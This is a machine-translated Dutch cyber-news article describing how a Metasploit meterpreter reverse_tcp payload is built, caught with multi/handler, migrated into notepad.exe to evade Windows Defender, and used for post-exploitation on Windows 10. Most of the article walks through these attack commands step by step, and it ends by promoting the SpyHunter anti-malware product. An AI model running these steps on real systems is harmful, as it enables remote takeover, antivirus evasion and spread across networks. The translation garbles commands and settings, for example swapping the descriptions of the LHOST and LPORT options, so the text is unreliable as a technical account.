Huis > Cyber ​​Nieuws > Kritieke Windows 10 Vulnerability - Multihandler Exploit
CYBER NEWS

Kritiek Windows 10 Vulnerability - Multihandler Exploit

Naam Trojaans:Win32 / Swrort
Type Trojaans
Korte Omschrijving Lees en machtigingen te schrijven in Windows 10. Hiermee kan de aanvaller naar andere PC aangesloten op de besmette één infecteren.
Symptomen Verschijning van een onbekende .exe-bestand.
Distributie Methode Spam-mails. MITM aanvallen, kwaadaardige redirects.
Detectie-instrument Download SpyHunter, Om te zien of uw systeem is getroffen door Trojan:Win32 / Swrort

p15_0000Een gevaarlijke exploit is ontdekt in Windows 10, met behulp van een Trojaans:Win32 / Swrort Windows Defender te omzeilen en krijgen lees- en schrijfrechten. Anonieme onderzoeker heeft de kwetsbaarheid van een kanaal aangetoond, genoemd Metasploitstation. Hij toont 3 fasen waarin u kunt glippen Windows 10 verdedigingen. Er was geen informatie tot nu toe op de vraag of deze exploit is vastgesteld of ontdekt geen.

Windows 10 Multihandler Exploit Infectie – Hoe je dat doet?

In de video, de tech-savvy gebruiker blijk gegeven van een simulatie van een '123.exe' bestand dat hij creëert en uitvoert alsof het in de echte wereld werd geopend als een bijlage bij een e-mail of uitgevoerd door een andere methode. We hebben besloten om het infectieproces te verdelen in drie fasen om u te helpen beter inzicht in de methodiek.

Fase 1: File Voorbereiding

De hacker maakt een laadvermogen met deze configuratie in een Linux-omgeving:

msfpaayload windows/meterpreter/reverse_tcp LHOST= LPORT = x> / home / but / New map / 123.EXE

portnumber1 * – Dit is de poort voor de aanval. Het kan elke poort (4444, 4324, etc.). We hebben portnumber1 geschreven, omdat hij gebruik maakt van een tweede poortnummer dat we de naam nadien.

Na deze fase is voltooid en het bestand wordt gecreëerd door de aanvaller en vallen op het gebruikerssysteem, de aanvaller kan overgaan tot Fase 2.

Fase 2: Met behulp van de exploit.

Op dit punt, de aanvaller maakt gebruik van multihandler te maken het de .exe te bekijken en te profiteren van de te benutten om een ​​actieve sessie te openen(aansluiten) het slachtoffer PC.

Dit kan gebeuren met behulp van de huidige bevellijnen:

msfconsole (Om de console te starten. Opent 'Artsen zonder Grenzen>' interface van)

In 'Artsen Zonder Grenzen' kan de aanvaller de volgende opdrachten uit te voeren:

msf> gebruik te benutten / Multi / handler
set Lhost 'slachtoffer IP-adres’
Stel lport 'portnumber1’

Nadien, de aanvaller voert de lading een sessie tot stand:

msfexploit(handler)>set payload windows/meterpreter/reverse_tcp

Om te controleren of een actieve sessie is mogelijk, de aanvaller schrijft het commando msfexploit(handler)> Opties weergeven die hem in staat stellen om dit te zien

→EXITFUNC proces ja Exit techniek(aanvaard: seh, draad..)
LHOST slachtoffer IP-adres ja De luister-poort
LPORT portnumber1 ja De luister adres

Dit stelt hem in staat om te zien dat hij de instellingen correct geconfigureerd en kunnen doorgaan met de daadwerkelijke infectie van de computer.

Fase 3: Infectie

Het commando dat de aanvaller gebruikt om een ​​actieve sessie te starten met het slachtoffer is 'exploiteren'. Na het uitvoeren van deze opdracht, het bestand '123.exe' terug met dit antwoord:

[*] Gestart omgekeerde handler op
[*] Het starten van de payload handler…

Op dit punt, het uitvoerbare bestand is gestart op de Windows-machine. Ondanks het feit dat Windows Defender software draaide, het niet stoppen met de aanval. Maar toen gescand op virussen, het Windows-antivirusprogramma onmiddellijk gedetecteerd '123.exe' als een Trojan:Win32 / Swrort.A.

Om detectie te vermijden, de aanvaller gebruikt een tactiek, riep migrerende waarin een 'notepad.exe' bestand dat de actieve sessie van '123.exe' migreert naar dit bestand na het aansluiten van gemaakt. Dit werd gedaan met behulp van het commando:

meterpreter>run post/windows/manage/migrate

Na migratie van het proces en het herhalen van dezelfde simulatie, maar met behulp (andere poort), de aanvaller was weer. Deze keer toen de aanvaller kreeg in de PC was hij niet herkend, zelfs nadat Windows Defender heeft een scan en de '123.exe' file was nog steeds aanwezig op de computer.

Vanaf daar, de aanvaller aangetoond volledige lees- en schreef machtigingen die door het creëren van een nieuwe map met een nieuw tekstdocument. Voor zover wij weten, de belangrijkste commando's die gebruikt kunnen worden na de aansluiting zijn:

> Sysinfo - om het systeem-versie en informatie weer te geven.
> dir :/ – aan een doelmap te openen.
> Shell - op de Windows-versie en andere informatie te tonen.
> Getwid - toont Windows ID.
> Ps -aux - toont alle .exe bestanden die in de Windows Task Manager.
> Ifconfig - geeft informatie over interfaces (IP-adressen en andere gegevens). Dit commando geeft de aanvaller de informatie op een andere computer die in dezelfde NIC en VLAN met de besmette PC. Dit kan zeer verwoestende voor thuis of op kantoor netwerken zijn in het geval een dergelijke aanval is goed georganiseerd.

Windows 10 Exploits – Conclusie

Er is geen actuele informatie over het al dan niet deze exploit is opgelost, maar net als met alle andere software, Er kunnen meer ongedekte degenen. Dit is de reden waarom in het geval u gebruik maakt van Windows 10, raden wij u aan te downloaden en te installeren geavanceerde bescherming tegen malware programma. Het zal je actief te beschermen en zich regelmatig bij te werken met de nieuwste bedreigingen. Ook, dergelijk programma heeft actieve schilden die onmiddellijk onbevoegde aansluitingen op te sporen.

donload_now_250
Spy Hunter scanner zal alleen de bedreiging op te sporen. Als u wilt dat de bedreiging voor automatisch verwijderd, je nodig hebt om de volledige versie van de anti-malware gereedschap kopen.Ontdek meer over SpyHunter Anti-Malware Tool / Hoe te verwijderen SpyHunter

Berta Bilbao

Berta is een speciale malware onderzoeker, dromen voor een veiliger cyberspace. Haar fascinatie voor IT-beveiliging begon een paar jaar geleden, toen een malware haar uit haar eigen computer op slot.

Meer berichten

Laat een bericht achter

Uw e-mailadres wordt niet gepubliceerd. Verplichte velden zijn gemarkeerd *

This website uses cookies to improve user experience. By using our website you consent to all cookies in accordance with our Privacybeleid.
Daar ben ik het mee eens